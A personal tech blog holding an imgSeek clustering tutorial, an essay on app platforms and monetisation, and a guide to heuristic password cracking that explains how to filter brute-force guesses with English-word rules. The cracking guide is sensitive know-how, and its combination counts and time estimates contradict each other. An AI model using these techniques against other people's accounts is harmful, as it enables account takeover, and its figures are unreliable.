A Blog About Anime, Code, and Pr0 H4x

Table of Contents

imgSeek - Overcoming Performance Bottlenecks by Clustering Iskdaemon Instances
Building the Better Brute Force Algorithm - A Guide to Heuristic Password Cracking
Making Money with Apps - Choosing the Right Platform and Monetization Strategy
iOS - How to convert BGRA video streams to Grayscale SUPER fast.
Hijacking Web Traffic
Squashing Bandwidth Leeches
Sidestepping Windows Software Restriction Policies
Network Ninjitsu: The Art of Bypassing Firewalls and Web Filters

imgSeek - Overcoming Performance Bottlenecks by Clustering Iskdaemon Instances

March 13, 2013 at 12:00 PM

imgSeek (and it's server-side variant iskdaemon) is an open source image matching engine developed by Ricardo Cabral. In a nutshell, imgSeek makes it possible (with just a little bit of hacking) to perform reverse image searches and visual similarity comparisons against a specific group of images of your choice, just like Google Images or TinEye (but without the beefy monthly fees). For more information, take a look at the official imgSeek documentation.

For those of you who may not see the value in being able to do reverse image searches and visual similarity comparisons on an arbitrary set of images, allow me to elaborate with a real-world example of how I use imgSeek.

Ever since mid-November I've been using imgSeek to handle all of the server-side logic behind the "identify a card by taking a picture of it" feature of my iOS app Duel Master: Yu-Gi-Oh Edition. With this feature all a user has to do is take a picture of a Yu-Gi-Oh card, and within seconds all of the relevant information about that particular card (details, rulings, prices, etc) will be presented to them. This is all accomplished by uploading the picture they took to one of the Studio Bebop API servers, feeding it through imgSeek, and then returning the results to the app for additional processing and presentation. You can see a demonstration of this feature in action in the promo video below.

As you can see, imgSeek definitely works, and it works pretty well too. However don't let my super awesome app promo fool you, there are some serious drawbacks and kinks to using imgSeek. Despite the fact that imgSeek is technically stable enough to be deployed for real-world projects, the truth is that it is still in-development software, and as such suffers from bugs, hiccups, and scary segmentation faults.

Moreover, imgSeek doesn't scale very well, especially when it comes to handling lots of requests at once. While there is some vague mention of a "clustered mode" within the default iskdaemon configuration file, it isn't actually an implemented feature yet. As such, if you hit a stock copy of iskdaemon with lots of requests at a time, you're going to start to see some serious lag due to the fact that at the moment a stock copy of iskdaemon can only process one request at a time. So if it takes roughly one second for your copy of iskdaemon to perform a visual similarity comparison, and you've got twenty or thirty requests in the queue, you can expect some serious latency. (Which will only grow worse as you add more images to your database.)

Luckily for all of you, I've taken it upon myself to implement fixes for all of theses gripes (and a few more I didn't bother mentioning), and put them into a special branch of iskdaemon called iskdaemon-clustered!

Clustered Access Layout

The basic theory behind clustering instances of iskdaemon is pretty straightforward. First you launch multiple instances of iskdaemon, each listening on a different port, but all sharing the same image database file. Then, you use Nginx (or whatever HTTP daemon floats your boat), to handle the actual load balancing via a round robin style proxy pass. Simple right? WRONG! Well sort of...

The above layout will work fine as long as you're just performing read requests (queryImgID, queryImgBlob, queryImgPath), but once you start doing write requests (addImgBlob, addImg) through the load balancing proxy pass, that's when things start to break. To put it simply, your instance nodes will start to develop database inconsistencies with each other. By which I mean that some nodes will have an image, while others some won't. Moreover once you start trying to save/load to the same database file things get even worse, because that's when you'll start to see endless loops of database errors and/or crashes.

To overcome this shortcoming, I decided to tweak things so that there is a separate instance of iskdaemon running outside of the proxy pass group, that is specifically dedicated to performing write requests. Then with the addition of some fancy h4x, I made it so that the reader iskdaemon instances in the proxy pass group automatically update their local copies of the image database so that they are always up to date.

Implementing the separate writer instance was pretty straight forward, but the logic behind keeping all of the reader instances up to date is a bit more complicated. In this next section I'll be going over in detail how I do that. You don't have to read the next section to compile/install iskdaemon-clustered, but you probably should. If you don't feel like it, skip ahead to Installing iskdaemon-clustered On Your Server.

Overcoming Database Inconsistencies With Multiple Iskdaemon Instances


Clustered access layout with separate writer instance.

The reason that parallel iskdaemon instances can develop database inconsistencies in the first place lies in the fact that iskdaemon reads and writes its image data to a single database file that is only read into memory when the iskdaemon process first starts. Any image data you add via addImgBlob or addImg is held only in memory until you call saveDb.

So when you add an image to your images database using one of your parallel instances of iskdaemon, the other instances won't know about it until they reread the database file, which normally only happens when you start iskdaemon. To overcome this hurdle I've modified queryImgBlob and queryImgID so that they call a special function that checks to see if the images database has been modified since the last time there was a read request, and rereads it into memory if there have been any changes, before doing any actual image matching work.

Unfortunately rereading the database file into memory is trickier than you might think. If for instance you try to reread the database file while your writer process is in the middle of saving its new changes, you'll more than likely run into a fat load of read errors that could potentially send your reader instances into an infinite loop of database errors. To work around this issue, I implemented another special function that copies the main images database file into a temporary file, which is read, and then deleted. If the read fails for some reason, the function recurses into itself until it successfully rereads the image database file. I'll be the first to admit that it's not the most elegant of solutions, but it's simple, and it works.

Below is a flow chart that outlines the process iskdaemon-clustered uses to handle read requests without running into database inconsistencies.



Installing iskdaemon-clustered On Your Server

Please note that the following instructions are for compiling/installing on a *nix system. You're on your own Windows users.

First up, make sure you have all of the necessary prerequisites. (If you are using Gentoo, you should be able to emerge all of this stuff without any problems.)

  • git
  • nginx
  • python version >= 2.5 (but not 3.0 yuck!) and python development libraries
  • python twisted matrix libs 8.x or later
  • python SOAPpy package 0.12
  • C/C++ compilers
  • libmagick
  • libmagick++
  • SWIG

Next, clone the iskdaemon-clustered Github repository.

git clone https://github.com/StudioBebop/iskdaemon-clustered.git
          

Now compile iskdaemon-clustered!

$ cd iskdaemon-clustered
          $ cd src
          $ python setup.py build
          $ sudo python setup.py install
          

Now assuming that you have all of the necessary prerequisites, and nothing went wrong, iskdaemon-clustered should now be installed on your system. If you are having problems compiling, try taking a look at the installation instructions on the imgSeek website.

Now for the fun part, configuring your iskdaemon cluster! As I explained earlier, the basic concept here is to launch multiple instances of iskdaemon.py in parallel that all share the same database file. To make this easier for you, I've included a python script (launch-clustered-isk.py) that makes this super easy (again it's a little hacky, but it gets the job done without too much work).

First copy launch-clustered-isk.py to wherever you'd like to hold the database and other files for your iskdaemon cluster. (I just use my home directory.)

cp iskdaemon-clustered/launch-clustered-isk.py ~
          

launch-clustered-isk.py should work right out of the box, but for the sake of learning, let's take a quick peak at it's configuration options.

Open launch-clustered-isk.py up in your favorite text editor (Nano master race reporting in). Lines 19-23 are the places where you can make adjustments where you need/want to, each line is commented, but I'll give you a quick overview anyway.

  • instance_count = 13
    This sets how many instances of iskdaemon.py you'd like to launch. With the default configuration 13 instances will be launched. 1 for writing, and 12 for reading.
  • start_port = 1336
    This sets the port to start your instances listening on. With each instance the listening port will be incremented by 1.
    • Instance 1 - listens on port 1336
    • Instance 2 - listens on port 1337
    • Instance 3 - listens on port 1338
  • execpath = "/usr/bin/iskdaemon.py"
    This sets the path to iskdaemon.py. The default value _should
    work, but you will need to adjust it if you ended up installing isdkaemon.py somewhere else.
  • isk_root = os.path.join(os.path.abspath("."), "isk-cluster")
    This sets the path that will be created to hold all of the iskdaemon cluster files. You should probably leave this line alone.
  • iskdbpath = os.path.join(os.path.abspath("."), "isk-db")
    This sets the path to the main iskdaemon image database file. You should probably leave this line alone.

Once you have launch-clustered-isk.py configured just the way you want it, it's time to configure Nginx to handle proxying requests to your cluster.

Open up Nginx's config file (should be /etc/nginx/nginx.conf on Gentoo) in your favorite text editor, and in the http{} section, add the following lines.

http {
              upstream isk-cluster {
                  server localhost:1337;
                  server localhost:1338;
                  server localhost:1339;
                  # ... skipping some lines, and assuming you configured 12 reader instances
                  server localhost:1346;
                  server localhost:1347;
                  server localhost:1348;
              }
          
              # listen on localhost on port 81
              server {
                  listen 81;
                  server_name localhost;
          
                  location / {
                          proxy_pass http://isk-cluster;
                  }
              }
          }
          

Now (re)start Nginx, and then run launch-clustered-isk.py. If everything went right, you should see a bunch of lines about launching iskdaemon instances and listening on different ports. If you see error messages, something has gone terribly terribly wrong, and it's up to you to figure out what.

Assuming everything went as planned, you should now be able to access your iskdaemon read cluster from http://localost:81, and your writing instance via http://localhost:1336. Have fun!

Miscellaneous Tips and Information

  • launch-clustered-isk.py isn't a daemon process. If you want to launch and forget it, do what I do, and launch it in a screen.

    $ screen $ ./launch-clustered-isk.py &
  • launch-clustered-isk.py uses infinite loops to keep your various iskdaemon instances running, even if they crash. If you want to shut down your iskdaemon cluster, execute the following commands.

    $ killall launch-clustered-isk.py $ killall iskdaemon.py
  • I've modified the queryImgBlob and addImgBlob functions a little bit. To use them, send them base64 encoded image data. I did this so that I could use these functions with Ruby's default XMLRPC library.
  • An additional way you can give your iskdaemon instances a boost is by renicing them. To renice your entire iskdaemon cluster, execute the following command.

    $ echo renice -n -10 -p `echo \`pgrep iskdaemon.py\` | sed -e 's/ / /g'` | sudo /bin/bash
  • Iskdaemon and iskdaemon-clustered are resource monsters. Make sure you have the hardware resources necessary to run things smoothly. You don't want to be dipping heavily into swap space because you ran out of RAM.
    • I'm running my iskdaemon cluster on a server with 64gb of RAM and an SSD for the database files.
  • I use iskdaemon-clustered in the following projects.

  • If you have an idea to improve iskdaemon-clustered, or are using it in a project, let me know!

Building the Better Brute Force Algorithm - A Guide to Heuristic Password Cracking

July 23, 2012 at 12:00 PM

As seen in the Summer 2012 edition of 2600: The Hacker Quarterly.

Let's begin with a brief overview of standard (non-decryption based) password cracking methods. When faced with the task of cracking a password hash, and reverse engineering the encryption algorithm used to create the hash of the original password isn't a viable choice, you are left with a couple of different options.

Dictionary Attacks

A dictionary attack is carried out by iterating through a list of words, creating a hash of each one, and comparing the result to your target hash until you find a match. While dictionary based cracking methods can be used to crack a lot of common passwords, they're not all that effective when things start to become more complicated.

Often people use one or more words in their password, and those words may or may not be separated by a space or contain numbers or punctuation. Take for example, the password "falconpunch". It contains the two words "falcon" and "punch". Both of these words are found in a standard list of dictionary words, but you wouldn't be able to crack this password using a dictionary attack, because they're mashed together to form a single 'word'.

We also run into the same issue with passwords that are made up of, or include, portmanteaus that are not generally found in dictionary lists. Take for instance the portmanteau made from combining the words "char" and "lizard". Chances are pretty good that your dictionary list doesn't include the word "charizard", thus rendering a dictionary attack not very effective for that password.

Brute Force Attacks

When dictionary attacks just won't do, you can always try cracking the password using the brute force method. A brute force attack is carried out by cycling through every possible combination of a sequence of characters (aaaa, aaab, aaac, etc), and hashing each one until you find the sequence whose hash matches your target hash.

The benefit of using a brute force attack, is that it has a 100% chance of success to crack your password hash. The downside though is that to iterate through every possible combination of a sequence of characters until you find a match for your target hash could end up taking a very long time, and it only gets worse the longer and more complicated your target password is.

Take for example the password "charizard rules". That's a password that is 15 characters long, and only contains letters and spaces. Simple right? Well in order to crack this password using a brute force attack, you would need to iterate through every possible combination of the letters a-z and the space (" ") character from a length of one to at least fifteen characters. Let's do some math to see just how many combinations (in theory) we would have to try.

Characters

Total Combinations

1 (27^1)

27

2 (27^2)

729

3 (27^3)

19,683

4 (27^4)

531,441

5 (27^5)

14,348,907

6 (27^6)

387,420,489

7 (27^7)

10,460,353,203

8 (27^8)

282,429,536,481

9 (27^9)

7,625,597,484,987

10 (27^10)

205,891,132,094,649

11 (27^11)

5,559,060,566,555,520

12 (27^12)

150,094,635,296,999,000

13 (27^13)

4,052,555,153,018,980,000

14 (27^14)

109,418,989,131,512,000,000

15 (27^15)

2,950,000,000,000,000,000,000

That's a total of 3,067,940,118,341,250,379,359 combinations.
At a rate of testing 50 hashes per second, it would take about 1,945,674,859,424 years to try every possible combination. That's almost two trillion years!

Now I'm not sure about you, but waiting a couple trillion years to crack someone's password sucks. So let's try cutting down that brute forcing time, by operating under the assumption that our target password has to be at least seven characters long. That means that we only need to calculate the combinations of the letters a-z and the space (" ") from a length of seven characters to at least fifteen characters. Let's see how our math looks now.

Characters

Total Combinations

7 (27^7)

10,460,353,203

8 (27^8)

282,429,536,481

9 (27^9)

7,625,597,484,987

10 (27^10)

205,891,132,094,649

11 (27^11)

5,559,060,566,555,520

12 (27^12)

150,094,635,296,999,000

13 (27^13)

4,052,555,153,018,980,000

14 (27^14)

109,418,989,131,512,000,000

15 (27^15)

2,950,000,000,000,000,000,000

That's a total of 3,067,940,118,340,848,058,083 combinations.
At a rate of testing 50 hashes per second, it would only take about 465,101,560,021 years to try every possible combination. Hooray, that's only 465 billion years which is a lot less time compared to two trillion years!

Conclusion

From the information above we've learned that dictionary attacks are nice, but aren't much help when trying to crack a password more complicated than something your grandma might come up with. (Aka. passwords consisting of more than just a single word or that include non-standard portmanteaus.) We've also learned that using a brute force attack will (eventually) crack any target password with a 100% rate of success, but it'll probably take a few eons to crack longer, more complicated passwords.

So what's a devilishly good looking super hacker to do? Why the answer is obvious. You need to use a smarter brute forcing algorithm!

Before We Continue

You may have noticed that I've conveniently forgotten to mention anything about passwords that include numbers or funky punctuation ($, &, @, etc). It's not that I don't acknowledge the existence of passwords like these, it's just that at this point we're only going to focus on passwords that use the letters a-z, spaces (" "), hyphens and underscores (- _), and common grammatical punctuation (. , ' ? !). I'll address all those kooky complicated passwords later on.

The Psychology of Password Creation

The primary issue with using a brute force attack to crack most real world passwords, is that they spend a ton of time comparing hashes generated from phrases like,

  • aaaaaaaaa
  • aaacccaad
  • xcv hjj abu
  • hhgdfgdrfg

Now these are all spiffy secure passwords, but you'd be hard pressed to find someone who would actually use a password like one of these. Granted there are a select group of paranoid types who I'm sure use passwords like these all the time, but more often than not people tend to pick passwords that they can actually remember; passwords that actually contain words. These words may not necessarily always be separated by spaces, be spelled correctly, or even appear in a dictionary, but they are all still at least words. They are phrases that can be read aloud, and phrases that people say aloud in their minds as they type them in.

Take for instance the words "falcon" and "punch", and all of the different ways they could be arranged to make a password. A few possible combinations would be "falcon punch", "falconpunch", "falcon punch!", "falconpunch!", and "falcon, punch!". Looking at these passwords, no matter how they're put together, the resulting password always includes the words "falcon" and "punch", and when you read it out loud, it's "falcon punch".

So in order to crack a 'regular password' (i.e. passwords that aren't random sequences of nonsense), we need a more heuristic brute forcing algorithm that doesn't waste it's time on unrealistic passwords like "aaaa" and "asdxcv", but instead focuses exclusively on generating passwords made up of words that adhere to the rules of English-like words and phrases.

What is an English-like Word or Phrase?

An English-like word is a word that may not necessarily be an actual English word, but still adheres to a series of rules that our brains use to determine whether or not a given sequence of characters qualifies as a "word". Therefore, an English-like phrase is a grouping of two or more English-like words that adhere to the rules that determine whether or not a group of words qualifies as a valid phrase.

Take for instance this article you're reading right now. As you take in each word, your brain is running a series of tests to make sure that the word you're looking at is actually a word, and not just a bunch of random letters. If I were to drop the word 'kguifdgj' in the middle of a sentence, your brain would automatically flag that word as not being a valid word because it doesn't follow the 'rules' of English-like words. That is, certain rules that every word follows in order to be considered a valid word by our brains. Therefore, you would conclude that that particular sentence was not a valid sentence because it wasn't made up entirely of valid words.

So in order to create a brute forcing algorithm that doesn't waste it's time on nonsense words like "sfdre" and "86ugkie65", we need to 'teach' it how to perform at least some of those same tests that our brain does for us automatically so that it can determine whether a word or phrase is valid or just gibberish. By doing this, we create a brute force algorithm that only generates possible passwords that an everyday person would potentially use. Which in turn drastically reduces the amount of time spent generating extremely unlikely possible passwords.

The Rules of English-like Words

Apostrophes

A word cannot include more than one apostrophe. If a word includes an apostrophe, the apostrophe can only be positioned as the last character, or second to last character, in the word. Moreover, an apostrophe's last bordering letter must be an s.

Examples:

  • chuck's is a valid word
  • chucks' is a valid word
  • chuck'x is not a valid word
  • ch'uks is not a valid word


Hyphens and Underscores

A word cannot include both hyphens and underscores. If a word includes hyphens or underscores, the word should be split at that punctuation, and each word should be tested independently for whether not it is a valid English-like word.

Examples:

  • snape-kills_dumbledore is not valid
  • lightsabersareawesome should be split at the underscores, and the the individual words should be tested separately to determine whether they are valid or not. If any of the individual words are invalid, then the entire word is invalid as well.

Ending Punctuation (! ? , .)

A word cannot include more than one instance of ending punctuation, and any occurrence of such punctuation can only be positioned as the last character of a word.


Other Punctuation (&, &, @, etc)

A word cannot include any instances of other punctuation.


Suffixes

If a word ends in a known suffix (ing, ist, scope, ology, etc), the last character before the suffix, cannot be the same as the first letter of the suffix.

Examples:

  • psychology is a valid word
  • psychoology is not a valid word

Note: There are a few words that don't follow this rule, like zoology. However since words like these are the (rare) exception to the rule, it's more effective to just ignore them.


Vowels

Words must include at least one vowel.

Character Repetition Patterns

The same character can never be repeated more than twice in a row.

Examples:

  • books is a valid word
  • boooks is not a valid word

The same sequence of characters can never be repeated more than twice in a row.

Examples:

  • mahimahi is a valid word
  • mahimahimahi is not a valid word

Character Position Analysis

One of the great things about computers is that they're very good at performing simple tasks over and over really fast. Because of this trait, there are certain tests we can have the computer perform to validate words that wouldn't be efficient if you were verifying a word by hand, one such test is Character Position Analysis.

A Character Position Analysis is a test performed by iterating through each character in a word, and analyzing that character's relationship with its neighboring characters in order to determine whether or not certain characters 'fit' next to each other.

To perform a Character Position Analysis, you first need to build a database that documents how often characters appears directly next to, or one character apart from, each other. This database is broken up Into three separate tables that keep track of occurrence patterns for:

  • the first three characters of a word (starters table)
  • the last three characters of a word (enders table)
  • and the characters in a word as a whole (neighbors table).

Below is an example table documenting the overall character occurrence patterns for the word "awesome". Each cell holds two numbers. The first number represents the number of times a character appears directly next to another character, and the second number represents the number of times a character appears one character apart from another character.

A

E

M

O

S

W

A

0, 0

0, 1

0, 0

0, 0

0, 0

1, 0

E

0, 1

0, 0

1, 0

0, 1

1, 0

1, 0

M

0, 0

1, 0

0, 0

1, 0

0, 1

0, 0

O

0, 0

0, 1

0, 0

0, 0

1, 0

0, 0

S

0, 0

1, 0

0, 1

1, 0

0, 0

0, 1

W

1, 0

1, 0

0, 0

0, 0

0, 1

0, 0

From the data in the table above, we can conclude that the letters 'a', 'e', 'm', 'o', and 's' never appear directly after the letter 'a'. We can then use this data to verify whether or not other words are valid. For example the word "amber" would be considered not valid, because the letter 'm' appears directly after the letter 'a' which our occurrence patterns table tells us isn't possible.

Well obviously 'amber' is a valid word (anyone who's seen Jurassic Park knows that), but the data we have in the table above says otherwise. So in order to perform an accurate Character Position Analysis, a very large list of words must be analyzed in order to build a useful set of character position occurrence tables. Such a list of words can be found here, http://www.bsdlover.cn/study/UnixTree/V7/usr/dict/words.html

Once you have a character position occurrence database, then you can perform a Character Position Analysis. A Character Position Analysis is broken up into three separate tests, and a word is only valid if it passes all three tests.


Starting Characters Position Analysis

This test is performed by taking the first three characters of a word, and checking in the starters table whether the occurrence count (aka neighbor score) for the first and second characters, or first and third characters is equal to zero. If either neighbor score is equal to zero, then the word is not valid.


Ending Characters Position Analysis

This test is performed by taking last three characters of a word, and checking in the enders table whether the occurrence count (aka neighbor score) for the third to last and second to last characters, or third to last and last characters is equal to zero. If either neighbor score is equal to zero, then the word is not valid.


General Character Position Analysis

This test is performed by iterating through each character in a word, and checking in the neighbors table whether the occurrence count (aka neighbor score) for each character being tested and the character next to it, and the character one character apart from the character being tested is equal to zero. If any of the neighbor scores is equal to zero, then the word is not valid.


Getting More Accurate Results

One way to get more accurate results when performing a Character Position Analysis, is to raise the minimum required neighbor score from zero, to a higher threshold.

Rules of English-like Phrases

Spaces

A valid English-like phrase cannot include any occurrence of three or more space characters (" ") in a row. On instances of two spaces in a row, the phrase should be split at the double space, and each sub-phrase should be tested separately. If any of the sub-phrases are not valid, then the entire phrase is not valid.

Examples:

  • "row row fight the power" is a valid phrase
  • "it's dangerous to go alone, take this" is not a valid phrase (because there are three spaces in a row)


Word Repetition

The same word can never be repeated more than three times in a valid English-like phrase.

Examples:

  • "row row fight the power" is a valid phrase
  • "row row row row your boat" is not a valid phrase


Phrase Ending Punctuation (! ? .)

Phrase ending punctuation may only appear at the end of a phrase.

Examples:

  • "zelda is so over powered in brawl!" is a valid phrase
  • "zelda is so! over powered in brawl!" is not a valid phrase


Commas

Commas may only appear at the end of words, and never at the end of a phrase.

Examples:

  • "charizard is cool, but so is blastoise" is a valid phrase
  • "cooking is so fun," is not a valid phrase


Words

In order for an English-like phrase to be considered valid, each word in the phrase must be a valid English-like word.

So what about those passwords that include numbers, or goofy punctuation?

While heuristic brute forcing algorithms are great for generating English like words and phrases, things begin to be a lot more complicated if your target password includes numbers or funky punctuation ($, &, @, etc).

Going back to the topic of the psychology of password creation, remember that in general people pick passwords that are actually made up of words. Keeping this in mind, we can reasonably conclude that passwords that include numbers and/or funky punctuation still follow this rule, but the word(s) in the password are obfuscated by these non-standard characters. Another point to consider for passwords that include numbers only, is that often they're just appended to the end of a password.

Take for instance the password "jalapeno". It's a valid English-like word, and using it as a base, you can obfuscate it with numbers and funky punctuation.

Examples:

  • "jalapen0", "jalap3no", "j414p3n0" - letters replaced with numbers
  • "jalapeno1", "jalapeno123" - numbers appended
  • "j@l@peno" - letters replaced with punctuation

All of the passwords above would not be considered valid English-like words, but under all of the numbers and punctuation, they actually are. So in order to crack passwords that include numbers and/or funky punctuation using a heuristic brute force algorithm, you need to develop a method that can mutate strings generated by the algorithm (making alterations like in the examples above) and then test all the password variants as well as the original password string against your target hash.

Are there any heuristic brute forcing programs available?

Why yes there are! I maintain a small proof-of-concept Ruby application/gem that implements heuristic brute forcing. See, http://github.com/jamespenguin/gentle-brute for more details.

Conclusion

Heuristic brute forcing provides hackers with the ability to crack long and complicated passwords using brute force style password cracking, while not wasting eons trying unrealistic passwords.

To illustrate my point, let's pit heuristic brute forcing against standard brute forcing to crack a five character password consisting of the letters a-z.

  • Using heuristic brute forcing (via the Ruby program above): 517,839 potential phrases
  • Using standard brute forcing: 11,881,376 potential phrases

That's 96% fewer phrases to try using heuristic brute forcing, compared to standard brute forcing!

Making Money with Apps - Choosing the Right Platform and Monetization Strategy

March 14, 2012 at 12:00 PM

I started developing mobile apps back in early 2009 after a friend suggested I try it out. Well I jumped in head first with no idea what I was doing, and it wasn't until August later that year that I finally had my first app approved and out onto the Apple App Store, getting my first real taste of app development success. Ever since then, I've made app development my career, have seen a lot of success, and have loved every minute of it.

A lot has changed since those early days. Smartphones are everywhere these days, and while that's great news for app developers, it seems like it's starting to become more and more difficult for indie developers to be able to get a foothold in the app world and actually make money. For this reason, I decided to write this article in an effort to help my fellow developers and entrepreneurs have a better understanding of what they need to do to make their apps successful and profitable.

[ The Two Most Important Factors to Consider ]

Alright, so you have a killer idea for a killer app that will make millions of dollars! Something that nobody has ever seen before, and something that is sure to set you up with a nice retirement spot on a beach somewhere warm and sunny. Or maybe not? Maybe your app is something a little more simple. Something that would be great for you and your friends, but has the potential to make money with others as well. Whatever the case may be, when it comes to making money on apps, there are two very important things that you need to consider before starting development.

As dramatic as this may sound (and setting aside dumb luck), your answers to these questions could very well make or break the success of your app, and your company.

[ Choosing the Right Platform for Your Project ]

The only options that you should really even consider for this question is either Android (Google) or iOS (Apple), since they are the ones that dominate the smartphone market. Their creators also happen to provide the most robust third party developer tools, which means that you'll be able to do a lot more with your apps with a lot less work.

Some of you might be thinking, "Wait, what about other platforms like Blackberry or Windows Phone? There are lots of people who still use those!" While this might technically be true, it still doesn't make them serious competitors with Apple and Google. Their market share is nothing compared to Android and iOS who control 78% of the market, and who will continue to expand their control as time presses forward. So unless you feel there is a very important reason that your app should support one of the lesser platforms, your choice of what to develop for should only be between Android and iOS.


Here is where the great divide begins to manifest itself. Everybody seems to have their own idea about which platform is the "best". Truth be told, at least from a purely technical standpoint, both Android and iOS are solid platforms to develop apps on. However, when it comes to making money selling apps, they are miles apart.

I can confidently say that based on my own personal experience, if you are developing an app for distribution to the general public with the intent of making money, and you aren't a major corporation like ESPN or EA Games, you should develop your app for iOS before you ever consider porting it to Android. There are several reasons that lead me to this conclusion, both programming and business related, but the bottom line is simply this. As an independent developer, you will make more money with an app developed for iOS than you will with an app developed for Android. Now, allow me to explain further.

  • Android users do not buy apps.
    It's a harsh thing to say, but unfortunately it's the truth. I believe that the root of the problem stems from the fact that apps are intangible goods, and as such their perceived value is entirely dependent on the conditions of the market that they're sold in.

    For example, Google loves to brag about how Android is an open source mobile OS, and how they have such open market standards for app development. In fact all you need to do to publish an app to the Android Marketplace (or Google Play as it's called now), is pay a $25 developer license fee, and then upload your app. That's it.

    While this approach might sound great in theory, it has led to a major influx of poorly designed apps that do little more than saturate the market, making it harder for quality apps to be noticed. Moreover because there is no mandatory review process for app submissions, and Java developers are a dime a dozen, lots of companies have chosen to develop quick one-off apps filled with ads that they release for free. The idea being that since there are so many Android users on so many different devices, that the sheer volume of usage will generate enough ad revenue to make their apps profitable.

    The problem with this is that because so many companies have taken this approach, the Android app market has become flooded with so many free apps that do the same thing, that it's created an end-user mentality of, "Why would I buy your app when there are six others that do the same thing for free?" Even if your paid app is far and away the greatest app ever for what it does, 99% of the time it's going to lose to its free competitors.

    Apple on the other hand, requires that every new app submission and update be subject to a mandatory review process in order to ensure that the app in question adheres to all human interface guidelines and development standards set out for their platform. This helps to stem the flow of one-off freebie apps, which in turn helps to level the playing field for people selling paid apps.

    For further reading on the subject of why Android apps make less money than their iOS counterparts, take a look at the article Android Users Like Apps, But Don't Like Paying For Them

  • How about some statistics?
    I have an app called Find Me Food! that I've released for both iOS and Android. The Android version of Find Me Food! has had a grand total of 14 sales between the dates of February 8 2012 and March 14 2012 (a little over one month). Whereas the iOS version has sold 61 units between the dates of March 5 2012 and March 11 2012 (one week). Or in other words, the iOS version of my app makes nearly five times as much money in a single week as the Android version makes in an entire month.


    Performance Statistics for Find Me Food! (March 5 2012 - March 11 2012)


    Performance Statistics for Find Me Food! (February 8 2012 - March 14 2012)

  • Marketing your apps, the App Store vs Android Marketplace (now Google Play)
    When it comes to making money with apps, I've found that the first 90% of the work comes from developing the app, and the other 100% of it is in the marketing. A large part of your product's success will hinge on the the distribution platform you choose for it. For iOS you have the Apple App Store, and for Android you have the Android Marketplace (now called Google Play). I personally feel that the App Store is the better choice of the two, at least from a marketing standpoint, for two reasons.

1. With the App Store, you can generate promo codes for any of your apps that people can use once to download them for free.  This is useful when submitting your app to review websites, as well as for special app giveaways and the like.  Google Play however does not have this feature.  If you want to give someone a free copy of your app, you actually have to provide them with a copy of your app binary.  I don't know about you, but I'd much rather just give someone a one-time use promo code, instead of a full copy of my app that they could freely distribute to anybody they like without me ever knowing.
          
          2. With Google Play, if you ever decide to make your app free, it's stuck like that __forever.__  Which means that you won't ever be able to quickly bolster your paid app's popularity and user base by making it free for a weekend.
          
  • iOS offers uniform hardware standards.
    One of the major reasons that Android has been able to come to control nearly 50% of the smartphone market, is because it is an open mobile OS designed to be able to run on just about any hardware. Which makes it possible for handset manufacturers to be able to put out cheap smartphones. However, this open attribute of Android's is a double edged sword.

    Because Android isn't designed to run on specific hardware, it loses a lot of finer performance optimizations that iOS has. It also forces developers to choose between either designing their apps to support the majority of handsets by tailoring their performance to the slowest device, or designing their apps to only work with specific handsets. Depending on the kind of app you are developing this may or may not be that big of an issue for you. However as you start to develop more resource intensive applications such as games, or augmented reality apps, it starts to become a real concern.

    On the other hand, developers making apps for iOS (for the most part) don't have to worry about this issue since Apple designs their mobile OS specifically to their own hardware (iPhone, iPod Touch, and iPad). This guarantees your apps the least amount of operating overhead between the OS and hardware, and the knowledge that all of your users are using the same hardware with only minor deviations in performance capabilities.

    One example of how this advantage can have a major effect on your app, is if the app does a lot of mathematical calculations, such as real time video data processing for augmented reality. If you were developing your app for iOS, then you would know for certain that any supported Apple device that would be running your app (read: anything newer than an iPhone 3G), would have a Cortex A8 (or better) CPU. Which would mean, that you could implement a video processing algorithm that uses ARM NEON intrinsic functions to process eight pixels of a video frame at a time, instead of just one.

    However, developing this same app for Android would require that you implement an additional non-intrinsic (and much slower) video processing algorithm for those devices that don't have Cortex A8 CPUs. In addition, because you have no way of knowing what the processing power is of the devices your users will be running your app on, its performance could vary greatly from device to device.

  • More iOS users are running the same, and often the latest, firmware.
    Every time Apple or Google releases an update to their mobile OS, there are lots of awesome new APIs and other things added which help developers make even better apps. The only drawback to this is that these updates are only useful if people are actually using them. That being said, most iOS users on average are running the latest and greatest version, or are only one or two minor releases behind. Unlike Android, who the majority of its users are still running very old revisions of the OS.


    Android version usage statistics as of March 5 2012

    As of writing this article, the latest and greatest version of Android is version 4, codenamed Ice Cream Sandwich. However, according to Google's own platform version usage statistics, only 1.6% of Android users are actually using this version. The majority of Android handsets (62%) are instead running the much older version 2.3. This is unfortunate, because developers who want their apps to appeal to the majority of Android users have to forgo the features and improvements introduced in Android version 3.0 and beyond, and instead tailor their apps to the much older 2.x versions.

    What's even worse, is that since it's up to manufacturers to handle porting Android to their devices, there's no guarantee that they'll ever see an update! Take for example my Samsung Galaxy S 4g, the most up to date firmware that Samsung offers for this phone is Android 2.3.6, and there appears to be no plans to make version 3.0 and beyond available. Unlike Apple, whose devices are all capable of running the latest version of iOS.


    iOS version usage statistics from August 2011

    It is a little bit more difficult to accurately gauge usage statistics for different versions of iOS, because Apple does not maintain active reports like Google does. However, fairly reliable usage statistics can be found from the blogs of various app developers. Despite the chart above being a year old, it more than illustrates my point that iOS users on average run the latest (or near latest) available firmware on their devices.

  • The Bottom Line
    There is nothing wrong with developing an app for Android. Despite the flaws and issues discussed above, it's still a solid mobile platform. That being said, I would highly recommend that you develop your app for iOS first, before you ever consider porting it to Android. You will make a lot more money doing so.

[ Choosing the Right Monetization Strategy ]

There are a few different ways that you can make money selling apps. It's important that you choose one or more strategies that play to the individual strengths of your app, so that you can squeeze as much revenue out of it as possible. Below are some different monetization strategies you could employ, as well as my thoughts and experiences using them.

  • Direct Paid App Sales
    The tried and true method of selling your apps for a fee. It's straightforward and simple, and if you've got a high quality app, it's the way to go (usually).

  • Ad Supported Free App
    With this strategy, you release your app for free, but fill it with ads. The idea is that because your app is free, it will get a lot of downloads (which is usually the case), and that all of those users seeing ads will generate a ton of ad revenue. While this may sound like a great approach in theory, in reality it's a fool's bet.

    Ad revenue is a joke. Unless you've created the next Angry Birds or the very first Flashlight App, your ad revenue isn't going to be nearly enough to constitute a reasonable return on your investment. To illustrate this point, let's take a look at some statistics from my app iManga Reader Lite, which uses the Freemium App Sales strategy (outlined below).


    iAd Performance Statistics for iManga Reader Lite (March 1 2012 - March 13 2012)

